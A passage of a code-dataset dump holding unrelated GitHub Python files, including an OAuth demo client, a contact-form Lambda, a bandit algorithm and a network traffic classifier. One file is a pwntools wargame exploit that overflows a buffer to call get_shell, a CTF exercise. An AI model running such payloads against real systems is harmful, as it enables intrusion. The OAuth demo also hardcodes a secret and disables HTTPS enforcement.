filename_queue.split('\\n')[0]\n imagefilename = os.path.join(dataDir, \"all_image/%s.jpg\"%filename)\n imageshape = cv2.imread(imagefilename).shape\n print(imageshape)\n\n rect_queue = open(os.path.join(dataDir, \"all_rect/%s.rct\"%filename), \"r\").readline().split(' ')\n dst_list.write('%s %s %s %s %s'%(imagefilename, rect_queue[0], rect_queue[1], rect_queue[2], rect_queue[3]))\n\n pointfilename = os.path.join(dataDir, \"all_point/%s.pts\"%filename)\n points_queue = open(pointfilename, \"r\").readlines()\n for point_queue in points_queue:\n point = point_queue.split('\\n')[0].split(' ')\n # print(point)\n dst_list.write(' %s %s'%(point[0], point[1]))\n\n dst_list.write('\\n')\n\n dst_list.close()\n","repo_name":"Aaronswei/landmark_detection","sub_path":"convertDataFormat.py","file_name":"convertDataFormat.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73636829810","text":"import os\nimport json\nimport boto3\nfrom serverless_sdk import tag_event\n\nSENDER = os.getenv(\"SENDER\")\nRECEIVER = os.getenv(\"RECEIVER\")\n\nmailer = boto3.client(\"ses\")\n\n\ndef contact(event, context):\n tag_event(\"custom-tag\", \"contact-form\", {\"custom\": {\"tag\": \"data \"}})\n\n print(event)\n data = json.loads(event.get(\"body\"))\n full_name, email = data.get(\"FullName\"), data.get(\"Email\")\n subject, message = data.get(\"Subject\"), data.get(\"Message\")\n\n mailer.send_email(\n Source=SENDER,\n Destination={\"ToAddresses\": [RECEIVER]},\n Message={\n \"Subject\": {\"Data\": f\"[Site] {subject}\", \"Charset\": \"utf-8\"},\n \"Body\": {\n \"Text\": {\n \"Data\": \"Message from: {}, email: {}:\\n---\\n{}\".format(\n full_name, email, message\n ),\n \"Charset\": \"utf-8\",\n }\n },\n },\n )\n\n headers = {\n \"Access-Control-Allow-Origin\": \"*\",\n }\n\n body = {\n \"message\": \"Thank you for your email\",\n }\n\n response = {\"statusCode\": 200, \"headers\": headers, \"body\": json.dumps(body)}\n\n return 
response\n","repo_name":"aihaddad/sls-contact-form","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"37488797943","text":"import sys\n\nX = int(sys.stdin.readline())\n\nL = [64]\n\nwhile(X < sum(L)):\n s_idx = L.index(min(L))\n s = min(L)\n L[s_idx] = s/2\n\n if(X > sum(L)):\n L.append(s/2)\nprint(len(L))\n","repo_name":"kkimlee/Algorithm","sub_path":"Baekjoon/Python/1064.py","file_name":"1064.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20916471987","text":"import os\n\nfrom flask import Flask, request, redirect, session, url_for, render_template\nfrom requests_oauthlib import OAuth2Session\n\napp = Flask(__name__)\napp.secret_key = \"secret\"\napp.template_folder = \"templates/client\"\n\n# this client is created in server.py\nclient_id = \"client-id\"\nclient_secret = \"client-secret\"\n\n# Authorization code and token url\nauthorization_base_url = \"http://localhost:5000/oauth/authorize\"\ntoken_url = \"http://localhost:5000/oauth/token\"\n\n# Resource url\nresource_server_url = \"http://localhost:5000/profile\"\n\n\n@app.route(\"/\")\ndef index():\n user = None\n if \"user\" in session:\n user = session[\"user\"]\n\n return render_template(\"home.html\", user=user)\n\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(\"user\", None)\n return redirect(url_for(\".index\"))\n\n\n@app.route(\"/login\")\ndef login():\n \"\"\"\n Redirect the user/resource owner to the OAuth provider (i.e. Github)\n using an URL with a few key OAuth parameters.\n \"\"\"\n server = OAuth2Session(client_id)\n authorization_url, state = server.authorization_url(authorization_base_url)\n\n # State is used to prevent CSRF, keep this for later.\n session[\"oauth_state\"] = state\n return redirect(authorization_url)\n\n\n@app.route(\"/callback\", methods=[\"GET\"])\ndef callback():\n \"\"\"\n Retrieving an access token.\n\n The user has been redirected back from the provider to your registered\n callback URL. With this redirection comes an authorization code included\n in the redirect URL. 
We will use that to obtain an access token.\n \"\"\"\n\n server = OAuth2Session(client_id, state=session[\"oauth_state\"])\n token = server.fetch_token(\n token_url, client_secret=client_secret, authorization_response=request.url\n )\n\n server = OAuth2Session(client_id, token=token)\n user_info = server.get(resource_server_url).json()\n\n session[\"user\"] = user_info[\"name\"]\n\n return redirect(url_for(\".index\"))\n\n\nif __name__ == \"__main__\":\n # This allows us to use a plain HTTP callback\n os.environ[\"OAUTHLIB_INSECURE_TRANSPORT\"] = \"1\"\n\n app.run(debug=True, port=7000, threaded=False)\n","repo_name":"nguyenkims/oauth-demo","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"42142301568","text":"from pwn import *\n\n#p = process('./sint')\n#gdb.attach(p, gdb_args=['-q', '-ex init-pwngdb'])\np = remote('host1.dreamhack.games', 20384)\n\ncontext.clear()\ncontext.update(arch='i386', os='linux')\ncontext.log_level='debug'\n\ne = ELF('./sint')\n\ngetshell = e.symbols['get_shell']\n\n\npayload = ''\npayload += 'A'*256\npayload += p32(0)\npayload += p32(getshell)\n\np.sendafter(\"Size: \", str(0)+\"\\x0a\")\np.recvuntil(\"Data: \", payload)\np.send(payload)\n\np.interactive()\n","repo_name":"HyeonBell/CTF-Wargame","sub_path":"dreamhack/sint/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"9287015476","text":"import argparse\nimport os\nimport torch\nfrom functools import partial\nfrom omegaconf import OmegaConf\nfrom main import instantiate_from_config\nfrom ldm.models.diffusion.ddim import DDIMSampler\nfrom ldm.data import testsets\n\n\nparser = argparse.ArgumentParser(description='Frame Interpolation Evaluation')\n\nparser.add_argument('--config', type=str, default=None)\nparser.add_argument('--ckpt', type=str, default=None)\nparser.add_argument('--dataset', type=str, default='Middlebury_others')\nparser.add_argument('--metrics', nargs='+', type=str, default=['PSNR', 'SSIM', 'LPIPS'])\nparser.add_argument('--data_dir', type=str, default='D:\\\\')\nparser.add_argument('--out_dir', type=str, default='eval_results')\nparser.add_argument('--resume', dest='resume', default=False, action='store_true')\n\n# sampler args\nparser.add_argument('--use_ddim', dest='use_ddim', default=False, action='store_true')\nparser.add_argument('--ddim_eta', type=float, default=1.0)\nparser.add_argument('--ddim_steps', type=int, default=200)\n\ndef main():\n\n args = parser.parse_args()\n \n # initialise model\n config = OmegaConf.load(args.config)\n model = instantiate_from_config(config.model)\n model.load_state_dict(torch.load(args.ckpt)['state_dict'])\n device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n model = model.to(device)\n model = model.eval()\n print('Model loaded successfully')\n\n # set up sampler\n if args.use_ddim:\n ddim = DDIMSampler(model)\n sample_func = partial(ddim.sample, S=args.ddim_steps, eta=args.ddim_eta, verbose=False)\n else:\n sample_func = partial(model.sample_ddpm, return_intermediates=False, verbose=False)\n\n # setup output dirs\n if not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n # initialise test set\n print('Testing on dataset: ', args.dataset)\n test_dir = os.path.join(args.out_dir, args.dataset)\n if args.dataset.split('_')[0] 
in ['VFITex', 'Ucf101', 'Davis90']:\n db_folder = args.dataset.split('_')[0].lower()\n else:\n db_folder = args.dataset.lower()\n test_db = getattr(testsets, args.dataset)(os.path.join(args.data_dir, db_folder))\n if not os.path.exists(test_dir):\n os.mkdir(test_dir)\n test_db.eval(model, sample_func, metrics=args.metrics, output_dir=test_dir, resume=args.resume)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"danier97/LDMVFI","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"20"} +{"seq_id":"39476525107","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport json\r\nimport os\r\n\r\nINPUT_FOLDER = 'database/monitors/'\r\n\r\ndef read_json(file_name):\r\n if(not os.path.isfile(file_name)):\r\n raise Exception('File ' + file_name + ' does not exist. Build it first.')\r\n\r\n with open(file_name, 'r') as file:\r\n data = json.loads(file.read())\r\n return data\r\n\r\ndef main():\r\n missing_fields = []\r\n \r\n database_files = [INPUT_FOLDER + f for f in os.listdir(INPUT_FOLDER) if os.path.isfile(os.path.join(INPUT_FOLDER, f))]\r\n for database_file in database_files:\r\n data = read_json(database_file)\r\n\r\n if not \"name\" in data:\r\n missing_fields.append(\" - Mandatory field 'name' is missing in file %s\\n\" % database_file)\r\n if not \"doc\" in data:\r\n missing_fields.append(\" - Mandatory field 'doc' is missing in file %s\\n\" % database_file)\r\n if not \"baudrate\" in data:\r\n missing_fields.append(\" - Mandatory field 'baudrate' is missing in file %s\\n\" % database_file)\r\n if not \"stopbit\" in data:\r\n missing_fields.append(\" - Mandatory field 'stopbit' is missing in file %s\\n\" % database_file)\r\n if not \"parity\" in data:\r\n missing_fields.append(\" - Mandatory field 'parity' is missing in file %s\\n\" % database_file)\r\n if not \"commands\" in data:\r\n missing_fields.append(\" - Mandatory field 'commands' is missing in file %s\\n\" % database_file)\r\n\r\n if len(missing_fields) > 0:\r\n message = \"Some mandatory fields are missing:\\n\"\r\n for missing_field in missing_fields:\r\n message = message + missing_field\r\n raise Exception(message)\r\n \r\n print(\"No mandatory field is missing\")\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"YooUp/RS232-Monitor-Database","sub_path":"devscript/check_mandatory_fields.py","file_name":"check_mandatory_fields.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"20"} +{"seq_id":"17468381655","text":"from django.template import Template, Context\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\n\n\ndef parse(kwargs, template_name=\"shortcodes/vimeo.html\"):\n video_id = kwargs.get('id')\n if video_id:\n width = int(kwargs.get(\n 'width',\n getattr(settings, 'SHORTCODES_VIMEO_WIDTH', 480))\n )\n height = int(kwargs.get(\n 'height',\n getattr(settings, 'SHORTCODES_VIMEO_HEIGHT', 385))\n )\n\n ctx = {\n 'video_id': video_id,\n 'width': width,\n 'height': height\n }\n return render_to_string(template_name, ctx)\n","repo_name":"mobolic/django-shortcodes","sub_path":"shortcodes/parsers/vimeo.py","file_name":"vimeo.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"20"} +{"seq_id":"38898226305","text":"import pygame, time, 
configparser\nfrom savehelper import *\n\n#vars\nsize = (800,600)\nscreen = pygame.display.set_mode(size)\nsmallfont = pygame.font.SysFont('Comic Sans MS', 20)\nmediumfont = pygame.font.SysFont('Comic Sans MS', 30)\nbigfont = pygame.font.SysFont('Comic Sans MS', 45)\nclock = pygame.time.Clock()\n\nBLUE = ((0,0,255))\nBLACK = ((0,0,0))\nWHITE = ((255,255,255))\n\nloadimage = pygame.image.load('load.png').convert_alpha()\nnewimage = pygame.image.load('new.png').convert_alpha()\n\nload = pygame.Rect(300,100,300,200)\nnew = pygame.Rect(300,350,300,200)\nloadt = bigfont.render(\"Load Game\", False, (255,0,0))\nnewt = bigfont.render(\"New Game\", False, (255,0,0))\nscreen.blit(loadimage,load)\nscreen.blit(newimage,new)\npygame.display.update()\n\ndone3 = False\nwhile not done3:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = event.pos\n if load.collidepoint(mouse_pos):\n choice = \"l\"\n done3 = True\n if new.collidepoint(mouse_pos):\n choice = \"n\"\n done3 = True\n\nscreen.fill(BLACK)\ninputbox = pygame.Rect(300,200,300,50)\npygame.draw.rect(screen, WHITE, inputbox)\nif choice == \"l\":\n message = mediumfont.render(\"Input game name to load\", False, (255,0,0))\nelif choice == \"n\":\n message = mediumfont.render(\"Input game name to create\", False, (255,0,0))\nscreen.blit(message, inputbox)\npygame.display.update()\ndone3 = False\nactive = False\ntext = \"\"\nwhile not done3:\n pygame.draw.rect(screen, WHITE, inputbox)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = event.pos\n if inputbox.collidepoint(mouse_pos):\n active = not active\n else:\n active = False\n if event.type == pygame.KEYDOWN:\n if active:\n if event.key == pygame.K_RETURN:\n done3=True\n elif event.key == pygame.K_BACKSPACE:\n text = text[:-1]\n else:\n text += event.unicode\n textt = bigfont.render(text,False,(255,0,0))\n if active == True:\n screen.blit(textt,inputbox)\n elif text == \"\":\n screen.blit(message,inputbox)\n else:\n screen.blit(textt,inputbox)\n pygame.display.update()\n clock.tick(60)\n\n\nloadcreatesave(text, choice, {\"streak\":1, \"score\":0, \"playerx\": 0, \"playery\": 0, \"flagx\":0, \"flagy\":0, \"bombs\":[], \"startx\":0, \"starty\":0, \"complete\":True})\n\nsave = config[\"save\"]\n","repo_name":"Will-Harmer/mazegame","sub_path":"titlescreen.py","file_name":"titlescreen.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28369969712","text":"import sys\ninput = sys.stdin.readline\noutput = sys.stdout.write\n\nN = int(input())\nst = 1\nwhile st<=N:\n st<<=1\ntree = [0]*(st<<1)\nlazy = [0]*(st<<1)\n\nfor idx,num in enumerate(list(map(int,input().split()))):\n tree[idx+st] = num\n\ntemp = st\nwhile temp>1:\n ed = temp\n temp>>=1\n for idx in range(temp,ed):\n tree[idx] = tree[idx<<1]+tree[idx<<1|1]\n\ndef propagate(node, ns, ne):\n if lazy[node]:\n tree[node] +=lazy[node]\n if ns!=ne:\n lazy[node<<1] += lazy[node]\n lazy[node<<1|1] += lazy[node]\n lazy[node] = 0\n\ndef update(ns,ne,s,e,node,k):\n propagate(node,ns,ne)\n if ns>e or ne>1\n update(ns,mid,s,e,node<<1,k)\n update(mid+1,ne,s,e,node<<1|1,k)\n tree[node]=tree[node<<1]+tree[node<<1|1]\n\ndef query(ns,ne,s,e,node):\n propagate(node,ns,ne)\n if ene: return 0\n if s<=ns and ne<=e: return tree[node]\n mid = (ne+ns)>>1\n return 
query(ns,mid,s,e,node<<1) + query(mid+1,ne,s,e,node<<1|1)\n\nM = int(input())\nfor i in range(M):\n row = list(map(int,input().split()))\n if row[0]==1:\n update(1,st,row[1],row[2],1,row[3])\n else:\n output(\"%d\\n\"%query(1,st,row[1],row[1],1))","repo_name":"seono/algorithm","sub_path":"python/plat4/16975.py","file_name":"16975.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72244510129","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 22 17:23:50 2020\n \nUpper Confidence Bound (UCB)\n \n\n@author: David Andrade / @Bits2Matter\n\"\"\"\n\nimport numpy as np \nimport matplotlib as plt\nimport pandas as pd \n\n# Read dataset \ndataset = pd.read_csv(\"Ads_CTR_Optimisation.csv\")\n\n\n# UCB algorithm\nimport math\nN = 10000\nd = 10\nnumber_selections = [0] * d \nsums_rewards = [0] * d\nads_selected = []\ntotal_reward = 0\nfor n in range(0, N):\n max_upper_bound = 0\n ad = 0\n for i in range(0, d):\n if(number_selections[i] > 0):\n \n mean_reward = sums_rewards[i] / number_selections[i]\n delta_i = math.sqrt(3/2 * math.log(n+1) / number_selections[i])\n upper_bound = mean_reward + delta_i\n else:\n upper_bound = 1e400\n \n if (upper_bound > max_upper_bound):\n max_upper_bound = upper_bound\n ad = i \n \n ads_selected.append(ad)\n number_selections[ad] = number_selections[ad] + 1\n reward = dataset.values[n, ad] \n sums_rewards[ad] = sums_rewards[ad] + reward\n total_reward = total_reward + reward\n\n\n\n# Vis results - hist\nplt.hist(ads_selected)\nplt.title(\"Hist of ads selections\")\nplt.xlabel(\"Ads\")\nplt.ylabel(\" # of times each ad was selected\")\nplt.show()\n\n\n# Thats better ","repo_name":"DavidAndrade27/DataScienceAndMLBassics","sub_path":"IA_dovo_r/6 _Reinforcement Learning/Upper Confidence Bound (UCB)/Upper_confidence_bound.py","file_name":"Upper_confidence_bound.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"18928187987","text":"from xml.dom import minidom\nfrom xml.dom.minidom import Node\n\n\ndef remove_blanks(node):\n for x in node.childNodes:\n if x.nodeType == Node.TEXT_NODE:\n if x.nodeValue:\n x.nodeValue = x.nodeValue.strip()\n elif x.nodeType == Node.ELEMENT_NODE:\n remove_blanks(x)\n\n\ndef get_cleaned_node(node_xml):\n \"\"\"Strip text values in XML.\"\"\"\n parsed = minidom.parseString(node_xml)\n remove_blanks(parsed)\n parsed.normalize()\n ret = parsed.toxml('utf-8')\n return ret.decode('utf-8')\n","repo_name":"mksh/aiobasex","sub_path":"aiobasex/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"14392059822","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#*** nmeta - Network Metadata - Policy Interpretation Class and Methods\n\n\"\"\"\nThis module is part of the nmeta2 suite\n.\nIt provides 
an object for traffic classification\nand includes ingesting the policy from YAML and checking\npackets against policy, calling appropriate classifiers\nand returning actions.\n.\nVersion 2.x Toulouse Code\n\"\"\"\n\n#*** Logging imports:\nimport logging\nimport logging.handlers\nimport coloredlogs\n\n#*** General imports:\nimport socket\nimport sys\nimport struct\n\n#*** Import dpkt for packet parsing:\nimport dpkt\n\n#*** To represent TCP flows and their context:\nimport flow\n\n#*** For importing custom classifiers:\nimport importlib\n\nclass TC(object):\n \"\"\"\n This class is instantiated by nmeta2_dpae.py and provides methods\n to ingest the policy as yaml and check\n packets against policy, calling appropriate classifiers\n and returning actions.\n \"\"\"\n def __init__(self, _config):\n #*** Get logging config values from config class:\n _logging_level_s = _config.get_value \\\n ('tc_logging_level_s')\n _logging_level_c = _config.get_value \\\n ('tc_logging_level_c')\n _syslog_enabled = _config.get_value('syslog_enabled')\n _loghost = _config.get_value('loghost')\n _logport = _config.get_value('logport')\n _logfacility = _config.get_value('logfacility')\n _syslog_format = _config.get_value('syslog_format')\n _console_log_enabled = _config.get_value('console_log_enabled')\n _coloredlogs_enabled = _config.get_value('coloredlogs_enabled')\n _console_format = _config.get_value('console_format')\n #*** Set up Logging:\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(logging.DEBUG)\n self.logger.propagate = False\n\n #*** Syslog:\n if _syslog_enabled:\n #*** Log to syslog on host specified in config.yaml:\n self.syslog_handler = logging.handlers.SysLogHandler(address=(\n _loghost, _logport),\n facility=_logfacility)\n syslog_formatter = logging.Formatter(_syslog_format)\n self.syslog_handler.setFormatter(syslog_formatter)\n self.syslog_handler.setLevel(_logging_level_s)\n #*** Add syslog log handler to logger:\n self.logger.addHandler(self.syslog_handler)\n #*** Console logging:\n if _console_log_enabled:\n #*** Log to the console:\n if _coloredlogs_enabled:\n #*** Colourise the logs to make them easier to understand:\n coloredlogs.install(level=_logging_level_c,\n logger=self.logger, fmt=_console_format, datefmt='%H:%M:%S')\n else:\n #*** Add console log handler to logger:\n self.console_handler = logging.StreamHandler()\n console_formatter = logging.Formatter(_console_format)\n self.console_handler.setFormatter(console_formatter)\n self.console_handler.setLevel(_logging_level_c)\n self.logger.addHandler(self.console_handler)\n\n #*** Initialise Identity Harvest flags (they get set at DPAE join time)\n self.id_arp = 0\n self.id_lldp = 0\n self.id_dns = 0\n self.id_dhcp = 0\n #*** Initialise list for TC classifiers to run:\n self.classifiers = []\n\n #*** Retrieve config values for elephant flow suppression:\n self.suppress_flow_pkt_count_initial = \\\n _config.get_value(\"suppress_flow_pkt_count_initial\")\n self.suppress_flow_pkt_count_backoff = \\\n _config.get_value(\"suppress_flow_pkt_count_backoff\")\n\n #*** Retrieve config values for flow class db connection to use:\n _mongo_addr = _config.get_value(\"mongo_addr\")\n _mongo_port = _config.get_value(\"mongo_port\")\n #*** Instantiate a flow object for classifiers to work with:\n self.flow = flow.Flow(self.logger, _mongo_addr, _mongo_port)\n\n def instantiate_classifiers(self, _classifiers):\n \"\"\"\n Dynamically import and instantiate classes for any\n dynamic classifiers specified in the controller\n nmeta2 
main_policy.yaml\n .\n Passed a list of tuples of classifier type / classifer name\n .\n Classifier modules live in the 'classifiers' subdirectory\n .\n \"\"\"\n self.logger.debug(\"Loading dynamic classifiers into TC module\")\n\n for tc_type, module_name in _classifiers:\n #*** Dynamically import and instantiate class from classifiers dir:\n self.logger.debug(\"Importing module type=%s module_name=%s\",\n tc_type, \"classifiers.\" + module_name)\n try:\n module = importlib.import_module(\"classifiers.\" + module_name)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Failed to dynamically load classifier \"\n \"module %s from classifiers subdirectory.\"\n \"Please check that module exists and alter\"\n \" main_policy configuration in controller \"\n \"nmeta2 configuration if required\",\n module_name)\n self.logger.error(\"Exception is %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n sys.exit(\"Exiting, please fix error...\")\n\n #*** Dynamically instantiate class 'Classifier':\n self.logger.debug(\"Instantiating module class\")\n class_ = getattr(module, 'Classifier')\n self.classifiers.append(class_(self.logger))\n\n def classify_dpkt_wrapper(self, pkt, pkt_receive_timestamp, if_name):\n \"\"\"\n Used to catch and handle exceptions in classify_dpkt otherwise\n it can just hang with no explaination... TBD: turn this into\n a decorator...\n \"\"\"\n try:\n result = self.classify_dpkt(pkt, pkt_receive_timestamp, if_name)\n return result\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"classify_dpkt exception %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n return {}\n\n def classify_dpkt(self, pkt, pkt_receive_timestamp, if_name):\n \"\"\"\n Perform traffic classification on a packet\n using dpkt for packet parsing\n \"\"\"\n result = {'type': 'none', 'subtype': 'none', 'actions': 0}\n ip = 0\n udp = 0\n tcp = 0\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n #*** Set local variables for efficient access, speed is critical...\n eth_src = mac_addr(eth.src)\n eth_dst = mac_addr(eth.dst)\n eth_type = eth.type\n\n if eth_type == 2048:\n ip = eth.data\n ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** Check if UDP or TCP:\n if ip.p == 6:\n tcp = ip.data\n tcp_src = tcp.sport\n tcp_dst = tcp.dport\n\n elif ip.p == 17:\n udp = ip.data\n udp_src = udp.sport\n udp_dst = udp.dport\n\n #*** Check for Identity Indicators:\n if udp:\n if udp_src == 53 or udp_dst == 53:\n #*** DNS (UDP):\n return self._parse_dns(udp.data, eth_src)\n\n elif udp_src == 67 or udp_dst == 67:\n #*** DHCP:\n return self._parse_dhcp(udp.data, eth_src)\n\n if tcp:\n if tcp_src == 53 or tcp_dst == 53:\n #*** DNS (TCP):\n return self._parse_dns(tcp.data, eth_src)\n\n if eth_type == 35020:\n #*** LLDP:\n return self._parse_lldp(pkt, eth_src)\n\n if eth_type == 2054:\n #*** ARP:\n return self._parse_arp(eth, eth_src)\n\n #*** The following is TCP specific but shouldn't be... 
TBD...\n if tcp:\n #*** Read packet into flow object for classifiers to work with:\n self.flow.ingest_packet(pkt, pkt_receive_timestamp)\n\n #*** Run any custom classifiers:\n for classifier in self.classifiers:\n try:\n result_classifier = classifier.classifier(self.flow)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Exception in custom classifier %s.\"\n \"Exception %s, %s, %s\",\n classifier, exc_type, exc_value, exc_traceback)\n return result\n\n #*** TBD, this will need updating for more types of return actions:\n if 'qos_treatment' in result_classifier:\n result['qos_treatment'] = result_classifier['qos_treatment']\n result['actions'] = 1\n result['type'] = 'treatment'\n\n #*** Suppress Elephant flows:\n #*** TBD, do on more than just IPv4 TCP...:\n if tcp and self.flow.packet_count >= \\\n self.suppress_flow_pkt_count_initial:\n self.logger.debug(\"Flow is candidate for suppression src_ip=%s \"\n \"src_port=%s dst_ip=%s dst_port=%s\",\n self.flow.ip_src, self.flow.tcp_src,\n self.flow.ip_dst, self.flow.tcp_dst)\n #*** Only suppress if there's been sufficient backoff since\n #*** any previous suppressions to prevent overload of ctrlr\n if not self.flow.suppressed or (self.flow.packet_count > \\\n (self.flow.suppressed + \\\n self.suppress_flow_pkt_count_backoff)):\n #*** Update the suppress counter on the flow:\n self.flow.set_suppress_flow()\n self.logger.debug(\"Suppressing TCP stream src_ip=%s \"\n \"src_port=%s dst_ip=%s dst_port=%s\",\n self.flow.ip_src, self.flow.tcp_src,\n self.flow.ip_dst, self.flow.tcp_dst)\n if result['type'] == 'none':\n result['type'] = 'suppress'\n elif result['type'] == 'treatment':\n result['type'] = 'treatment+suppress'\n else:\n self.logger.error(\"Unknown result type %s\", result['type'])\n else:\n self.logger.debug(\"Deferring suppression TCP stream src_ip=%s \"\n \"src_port=%s dst_ip=%s dst_port=%s\",\n self.flow.ip_src, self.flow.tcp_src,\n self.flow.ip_dst, self.flow.tcp_dst)\n self.logger.debug(\" self.flow.suppressed=%s\",\n self.flow.suppressed)\n\n if result['type'] != 'none':\n #*** Add context to result:\n result['ip_A'] = self.flow.ip_src\n result['ip_B'] = self.flow.ip_dst\n result['proto'] = 'tcp'\n result['tp_A'] = self.flow.tcp_src\n result['tp_B'] = self.flow.tcp_dst\n result['flow_packets'] = self.flow.packet_count\n\n return result\n\n def _parse_dns(self, dns_data, eth_src):\n \"\"\"\n Check if packet is DNS, and if so return a list\n of answers (if exist), with each list item a dict\n of type/name/address/ttl\n \"\"\"\n if self.id_dns:\n #*** DNS:\n self.logger.debug(\"Is it DNS?\")\n try:\n dns = dpkt.dns.DNS(dns_data)\n except dpkt.NeedData:\n self.logger.debug(\"DNS packet no/invalid data\")\n return {}\n queries = dns.qd\n answers = dns.an\n detail1 = []\n for answer in answers:\n if answer.type == 1:\n #*** DNS A Record:\n answer_ip = socket.inet_ntoa(answer.rdata)\n answer_name = answer.name\n answer_ttl = answer.ttl\n self.logger.debug(\"dns_answer_name=%s dns_answer_A=%s \"\n \"answer_ttl=%s\",\n answer_name, answer_ip, answer_ttl)\n record = {'type': 'A',\n 'name': answer_name,\n 'address': answer_ip,\n 'ttl': answer_ttl}\n detail1.append(record)\n elif answer.type == 5:\n #*** DNS CNAME Record:\n answer_cname = answer.cname\n answer_name = answer.name\n self.logger.debug(\"dns_answer_name=%s dns_answer_CNAME=%s\",\n \"answer_ttl=%s\",\n answer_name, answer_cname, answer_ttl)\n record = {'type': 'CNAME',\n 'name': answer_name,\n 'address': answer_cname,\n 'ttl': answer_ttl}\n 
detail1.append(record)\n else:\n #*** Not a type that we handle yet\n pass\n if len(detail1) > 0:\n result = {'type': 'id', 'subtype': 'dns', 'src_mac': eth_src,\n 'detail1': detail1}\n else:\n result = {}\n self.logger.debug(\"DNS result=%s\", result)\n return result\n else:\n return {}\n\n def _parse_dhcp(self, udp_data, eth_src):\n \"\"\"\n Check if packet is DHCP, and if so return the details\n \"\"\"\n dhcp = dpkt.dhcp.DHCP(udp_data)\n if self.id_dhcp and dhcp:\n #*** DHCP:\n self.logger.debug(\"DHCP details are %s\", dhcp)\n result = {'type': 'id', 'subtype': 'dhcp', 'src_mac': eth_src,\n 'detail1': dhcp}\n return result\n else:\n return {}\n\n def _parse_arp(self, eth, eth_src):\n \"\"\"\n Check if packet is ARP, and if so return the details\n \"\"\"\n if self.id_arp:\n #*** ARP:\n self.logger.debug(\"Is it ARP?\")\n arp = eth.arp\n if arp:\n #*** Build a CSV string of spa,sha,tpa,tha:\n arp_details = socket.inet_ntoa(arp.spa)\n arp_details += \",\" + mac_addr(arp.sha)\n arp_details += \",\" + socket.inet_ntoa(arp.tpa)\n arp_details += \",\" + mac_addr(arp.sha)\n self.logger.debug(\"ARP details are %s\", arp_details)\n result = {'type': 'id', 'subtype': 'arp',\n 'src_mac': eth_src,\n 'detail1': arp_details}\n return result\n else:\n return {}\n else:\n return {}\n\n def _parse_lldp(self, pkt, eth_src):\n \"\"\"\n Check if packet is LLDP, and if so return the details\n \"\"\"\n if self.id_lldp:\n #*** LLDP?, try a decode:\n self.logger.debug(\"Is it LLDP?\")\n payload = pkt[14:]\n system_name, port_id = self._parse_lldp_detail(payload)\n self.logger.debug(\"LLDP MAC=%s system_name=%s port_id=%s\",\n eth_src, system_name, port_id)\n result = {'type': 'id', 'subtype': 'lldp',\n 'src_mac': eth_src,\n 'detail1': system_name}\n return result\n else:\n return {}\n\n def _parse_lldp_detail(self, lldpPayload):\n \"\"\"\n Parse basic LLDP parameters from an LLDP packet payload.\n Based on github code by GoozeyX\n (https://raw.githubusercontent.com/GoozeyX/python_lldp/master/ \\\n lldp_collector.py)\n \"\"\"\n system_name = None\n vlan_id = None\n port_id = None\n\n while 